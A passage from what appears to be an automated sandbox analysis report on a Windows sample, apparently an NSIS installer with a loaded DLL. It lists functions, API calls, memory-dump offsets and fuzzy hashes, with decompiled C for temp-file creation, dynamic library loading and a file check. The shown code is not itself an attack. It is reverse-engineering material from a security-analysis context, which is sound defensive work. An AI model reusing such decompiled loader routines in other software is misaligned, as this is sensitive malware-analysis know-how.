                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                • String ID:
                                                                                                                • API String ID: 2744730728-0
                                                                                                                • Opcode ID: 8500a15637f456fae2e085a983d42e0d5f8e14ec2e8b0908e3cbc78ee7a98544
                                                                                                                • Instruction ID: b7b59fca3650b3114d5696de3193e4e599359b33b0314312491e2c89843cb521
                                                                                                                • Opcode Fuzzy Hash: 8500a15637f456fae2e085a983d42e0d5f8e14ec2e8b0908e3cbc78ee7a98544
                                                                                                                • Instruction Fuzzy Hash: 2601C4B6502709ABCB009FA9DC04B9E7FB9EF82379F34421DF5289A1D0DBB48506DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEC8BD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • type must be number, but is , xrefs: 6FEC8C97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: task
                                                                                                                • String ID: type must be number, but is
                                                                                                                • API String ID: 1384045349-1272216085
                                                                                                                • Opcode ID: 2859415f63938eb1f90dc205b55ed3eda1c50bbc53eed1ec7945d95bec8b7b1e
                                                                                                                • Instruction ID: f05be063b3306fc8f051d7ea1fe4e9ee5d699021daa8a24f7b2e690226e60b89
                                                                                                                • Opcode Fuzzy Hash: 2859415f63938eb1f90dc205b55ed3eda1c50bbc53eed1ec7945d95bec8b7b1e
                                                                                                                • Instruction Fuzzy Hash: 0E413074909648DFCB04CFA4CA50AEDBFB5FF49314F20816DE9266B394DB30AA05CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405EAB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405EAB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				void* _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_v12 = _t12;
					_t13 =  *0x40a660; // 0x61
					_t23 = _t23 - 1;
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 = _t17;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                0x00405eb1
                                                                                                                0x00405eb7
                                                                                                                0x00405eb8
                                                                                                                0x00405eb8
                                                                                                                0x00405ebd
                                                                                                                0x00405ec0
                                                                                                                0x00405ec5
                                                                                                                0x00405ec6
                                                                                                                0x00405ec9
                                                                                                                0x00405ed1
                                                                                                                0x00405ee0
                                                                                                                0x00405ee4
                                                                                                                0x00405eec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405ef0
                                                                                                                0x00000000
                                                                                                                0x00405ef2
                                                                                                                0x00405ef2
                                                                                                                0x00405ef2
                                                                                                                0x00405ef5
                                                                                                                0x00405ef8
                                                                                                                0x00405ef8
                                                                                                                0x00405efb
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                • String ID: nsa
                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEF1BF4, Relevance: 4.9, APIs: 3, Instructions: 406COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d265218af71fd55068636b06f032ec3f80bc8683568e0e05860cc7aede140216
                                                                                                                • Instruction ID: 5fca742b147f9e5bf8d28d1c91e589470b52da89268160fa29204a5aa8e76488
                                                                                                                • Opcode Fuzzy Hash: d265218af71fd55068636b06f032ec3f80bc8683568e0e05860cc7aede140216
                                                                                                                • Instruction Fuzzy Hash: ABD1C6F6E0671CAADB18CED9DC4079E7EB6AF85724F34412FE805A7240E77998038B51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEF7F18, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 6FEF7F8B
                                                                                                                • _free.LIBCMT ref: 6FEF7FE1
                                                                                                                  • Part of subcall function 6FEF7DBD: _free.LIBCMT ref: 6FEF7E15
                                                                                                                  • Part of subcall function 6FEF7DBD: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6FF0BAA0), ref: 6FEF7E27
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$InformationTimeZone
                                                                                                                • String ID:
                                                                                                                • API String ID: 597776487-0
                                                                                                                • Opcode ID: 49cc9d1ee9ede214757924ec54717a9cdb7d93affa6884c4a017f8fdf1e177df
                                                                                                                • Instruction ID: 2cfd95a1edcf0991d2c583809df256cb57eb920ce2062d6758783c85f513ea98
                                                                                                                • Opcode Fuzzy Hash: 49cc9d1ee9ede214757924ec54717a9cdb7d93affa6884c4a017f8fdf1e177df
                                                                                                                • Instruction Fuzzy Hash: D021213380631597CB2096388D41EDA7F788F42378F3107A9D994A72D0EB309D8786A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FECFDE0, Relevance: 4.6, APIs: 3, Instructions: 69memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FECFE19
                                                                                                                  • Part of subcall function 6FEA8FD0: _DebugHeapAllocator.LIBCPMTD ref: 6FEA8FDE
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FECFE7C
                                                                                                                • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FECFE95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                • String ID:
                                                                                                                • API String ID: 1698587239-0
                                                                                                                • Opcode ID: b955584df4f6e23aa3941efc931d2a02114e63f466408a07ab2df87a46f7079f
                                                                                                                • Instruction ID: 6c48df31001b66eb07a20458c55c8969913276bb15ebf613faed0d229031cb07
                                                                                                                • Opcode Fuzzy Hash: b955584df4f6e23aa3941efc931d2a02114e63f466408a07ab2df87a46f7079f
                                                                                                                • Instruction Fuzzy Hash: FD21567190824CABCB18DFB88950BDEBB78EB46324F60436DF4256B2D4DB3659018B62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEDB131, Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PathFindFileNameW.SHLWAPI(00000000,?,6FEDB257,?,?), ref: 6FEDB13D
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,6FED077D,?,00000000,6FF115CC,00000000), ref: 6FEDB17C
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,6FED077D,?,00000000,6FF115CC,00000000), ref: 6FEDB188
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$FileFindNamePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3295048339-0
                                                                                                                • Opcode ID: 7e64c118aa74df94a21cc8051b1afe229ba2d320aef34878a7ee1aabf22db568
                                                                                                                • Instruction ID: 4cff3dc8b538978c9e48b06aa28d97c41eabacce376a3905eda7f2ded57b3101
                                                                                                                • Opcode Fuzzy Hash: 7e64c118aa74df94a21cc8051b1afe229ba2d320aef34878a7ee1aabf22db568
                                                                                                                • Instruction Fuzzy Hash: DE117371814308AFDB00AF65D808B5E3FACAF0172CF24845EF5698B6A1EB75D552CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FECF7F0, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000564,?,?,6FECF7BE,00000000), ref: 6FECF7FA
                                                                                                                • CoUninitialize.OLE32(?,?,6FECF7BE,00000000), ref: 6FECF852
                                                                                                                  • Part of subcall function 6FEB6550: DestroyWindow.USER32 ref: 6FEB656E
                                                                                                                  • Part of subcall function 6FEB6550: DestroyWindow.USER32(?), ref: 6FEB658D
                                                                                                                  • Part of subcall function 6FEB6550: DestroyWindow.USER32(?), ref: 6FEB65AD
                                                                                                                  • Part of subcall function 6FEB6550: DestroyWindow.USER32(?), ref: 6FEB65CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DestroyWindow$CloseHandleUninitialize
                                                                                                                • String ID: D}
                                                                                                                • API String ID: 4084040042-2108495986
                                                                                                                • Opcode ID: 1b6a92d82401448fa3fe1149847c911a6f0df775ec2823626412d2d7cbc0230c
                                                                                                                • Instruction ID: 23bbe2f5f5beba51c8896a8cdd43a88aefe4b2942a6b9bf5b35254cc830ea7e7
                                                                                                                • Opcode Fuzzy Hash: 1b6a92d82401448fa3fe1149847c911a6f0df775ec2823626412d2d7cbc0230c
                                                                                                                • Instruction Fuzzy Hash: DD01DF305207409FCB44DBA4C916B593BA5BF42338F11011CF0084B3E4CBB568A5EB75
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FED1A19, Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNEL32(?,00000040,00000000,00000002,?,?,?,?,6FEAC457,00000008,?,00000002,?,00000040,00000000), ref: 6FED1A38
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,6FEAC457,00000008,?,00000002,?,00000040,00000000), ref: 6FED1A46
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,6FEAC457,00000008,?,00000002,?,00000040,00000000), ref: 6FED1A53
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1156039329-0
                                                                                                                • Opcode ID: 3e71c54178c99a02ff76270ff9c9e5bf5684e7c84c424a1acfe340202403ac73
                                                                                                                • Instruction ID: 33d99e87f4a66b6b19ae45bc5903e123890cc8777547604c3269c77c406b165f
                                                                                                                • Opcode Fuzzy Hash: 3e71c54178c99a02ff76270ff9c9e5bf5684e7c84c424a1acfe340202403ac73
                                                                                                                • Instruction Fuzzy Hash: EEF01D75900609EFDF04DFA8DC44D9E7FB8EF45360B20865AF81596650D7B0EA109B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406328, Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406328(signed int _a4) {
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				signed int _t9;

				_t9 = _a4;
				_t8 =  *(0x40c060 + _t9 * 8);
				_t6 = GetModuleHandleA(_t8);
				if(_t6 != 0) {
					L2:
					return GetProcAddress(_t6,  *(0x40c064 + _t9 * 8));
				}
				_t6 = LoadLibraryA(_t8); // executed
				if(_t6 != 0) {
					goto L2;
				}
				return _t6;
			}






                                                                                                                0x00406329
                                                                                                                0x0040632e
                                                                                                                0x00406336
                                                                                                                0x0040633e
                                                                                                                0x0040634b
                                                                                                                0x00000000
                                                                                                                0x00406353
                                                                                                                0x00406341
                                                                                                                0x00406349
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040635b

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 310444273-0
                                                                                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEAD050, Relevance: 3.1, APIs: 2, Instructions: 115memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEAD139
                                                                                                                  • Part of subcall function 6FED2D44: __EH_prolog3.LIBCMT ref: 6FED2D4B
                                                                                                                  • Part of subcall function 6FED2D44: __EH_prolog3_catch.LIBCMT ref: 6FED2D8D
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEAD1FA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$H_prolog3H_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 1036897443-0
                                                                                                                • Opcode ID: f1566fbe714541147b3e405fa02b7af82fb39a7ed4656b44916eba93808da02f
                                                                                                                • Instruction ID: 29fe919bf8a82dda5dd8a1a4c0c05401326ae00abfc306502d4004f81d9c407f
                                                                                                                • Opcode Fuzzy Hash: f1566fbe714541147b3e405fa02b7af82fb39a7ed4656b44916eba93808da02f
                                                                                                                • Instruction Fuzzy Hash: 425108719002689BCB29DB64CD91BDEBBB5AB59304F2042EDA5196B2D0DB312F85CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEAC3C0, Relevance: 3.1, APIs: 2, Instructions: 92sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,3A83C854), ref: 6FEAC409
                                                                                                                • Sleep.KERNEL32(00000064), ref: 6FEAC411
                                                                                                                  • Part of subcall function 6FED1A19: SetFilePointer.KERNEL32(?,00000040,00000000,00000002,?,?,?,?,6FEAC457,00000008,?,00000002,?,00000040,00000000), ref: 6FED1A38
                                                                                                                  • Part of subcall function 6FED1A19: GetLastError.KERNEL32(?,?,?,?,6FEAC457,00000008,?,00000002,?,00000040,00000000), ref: 6FED1A46
                                                                                                                  • Part of subcall function 6FED1A19: GetLastError.KERNEL32(?,?,?,?,?,6FEAC457,00000008,?,00000002,?,00000040,00000000), ref: 6FED1A53
                                                                                                                  • Part of subcall function 6FED205A: __EH_prolog3.LIBCMT ref: 6FED2061
                                                                                                                  • Part of subcall function 6FED14E1: FindCloseChangeNotification.KERNEL32(?,?,?,6FEAC37B,00000000,?,00000001,00001000,00000000,00000000,00000000,3A83C854), ref: 6FED14F0
                                                                                                                  • Part of subcall function 6FED14E1: GetLastError.KERNEL32(?,?,?,6FEAC37B,00000000,?,00000001,00001000,00000000,00000000,00000000,3A83C854), ref: 6FED1514
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$File$ChangeCloseFindH_prolog3ModuleNameNotificationPointerSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1839785596-0
                                                                                                                • Opcode ID: b0332a6245e21e716f7f98ded6f1d039ae701189de9428e05f21cdeeea1ca7f4
                                                                                                                • Instruction ID: 145b9aebf14d4e72e4a0451fda92190208d36a128ed572011c2b7fce30ed780d
                                                                                                                • Opcode Fuzzy Hash: b0332a6245e21e716f7f98ded6f1d039ae701189de9428e05f21cdeeea1ca7f4
                                                                                                                • Instruction Fuzzy Hash: 02413770941218AEEB24DB94DC99BECB7B8EB54704F2081D9A10AA66D0DB742F85CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEDC34C, Relevance: 3.1, APIs: 2, Instructions: 58timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(00000000,00001000,00000000,?,?,?,00000000,?,00000001,00001000,00000000,00000000,00000000,3A83C854), ref: 6FEDC386
                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,00001000,?,?,?,?,00000000,?,00000001,00001000,00000000,00000000,00000000,3A83C854), ref: 6FEDC39A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                • String ID:
                                                                                                                • API String ID: 1707611234-0
                                                                                                                • Opcode ID: 2b97c6db5128ee7c74df7379cf477fedfe495c384f5c8e32b91805dddf476582
                                                                                                                • Instruction ID: 19d25f46a535cc8bfa94a04dfe28126887893c3df37b7319a78b06dee46f6d2f
                                                                                                                • Opcode Fuzzy Hash: 2b97c6db5128ee7c74df7379cf477fedfe495c384f5c8e32b91805dddf476582
                                                                                                                • Instruction Fuzzy Hash: 28114272A00208ABDB04DFA8D944FDEB7FCAF18255F20841DF515E7640DB70EA14CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004067AA, Relevance: 3.1, APIs: 2, Instructions: 53stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004067AA(void* __eflags, intOrPtr _a4) {
				signed char* _t12;
				signed int _t14;
				long _t16;
				signed int _t17;
				signed short* _t24;
				signed int _t26;

				E00406035(0x461e18, _a4);
				_t24 = E00405D85(0x461e18);
				if(_t24 != 0) {
					E00406064(_t24);
					if(( *0x47eb08 & 0x00000080) == 0) {
						L5:
						_t26 = _t24 - 0x461e18 >> 1;
						while(lstrlenW(0x461e18) > _t26) {
							_t12 = E00406301(0x461e18);
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040677D(0x461e18);
								continue;
							} else {
								_t14 = 0;
								L11:
								return _t14;
							}
						}
						E0040674E(0x461e18);
						_t16 = GetFileAttributesW(0x461e18); // executed
						_t14 = 0 | _t16 != 0xffffffff;
						goto L11;
					}
					_t17 =  *_t24 & 0x0000ffff;
					if(_t17 == 0 || _t17 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                                                0x004067b6
                                                                                                                0x004067c1
                                                                                                                0x004067c5
                                                                                                                0x004067cc
                                                                                                                0x004067d8
                                                                                                                0x004067e7
                                                                                                                0x004067f0
                                                                                                                0x00406809
                                                                                                                0x004067f5
                                                                                                                0x004067fc
                                                                                                                0x00406804
                                                                                                                0x00000000
                                                                                                                0x0040682d
                                                                                                                0x0040682d
                                                                                                                0x00406827
                                                                                                                0x00000000
                                                                                                                0x00406827
                                                                                                                0x004067fc
                                                                                                                0x00406811
                                                                                                                0x00406817
                                                                                                                0x00406825
                                                                                                                0x00000000
                                                                                                                0x00406825
                                                                                                                0x004067da
                                                                                                                0x004067e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004067e0
                                                                                                                0x004067c7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(-00000002,?,00461E18,004E30C8,004067C1,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 00405D93
                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405D98
                                                                                                                  • Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405DB0
                                                                                                                • lstrlenW.KERNEL32(00461E18,004E30C8,00000000,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 0040680A
                                                                                                                • GetFileAttributesW.KERNEL32(00461E18,00461E18), ref: 00406817
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
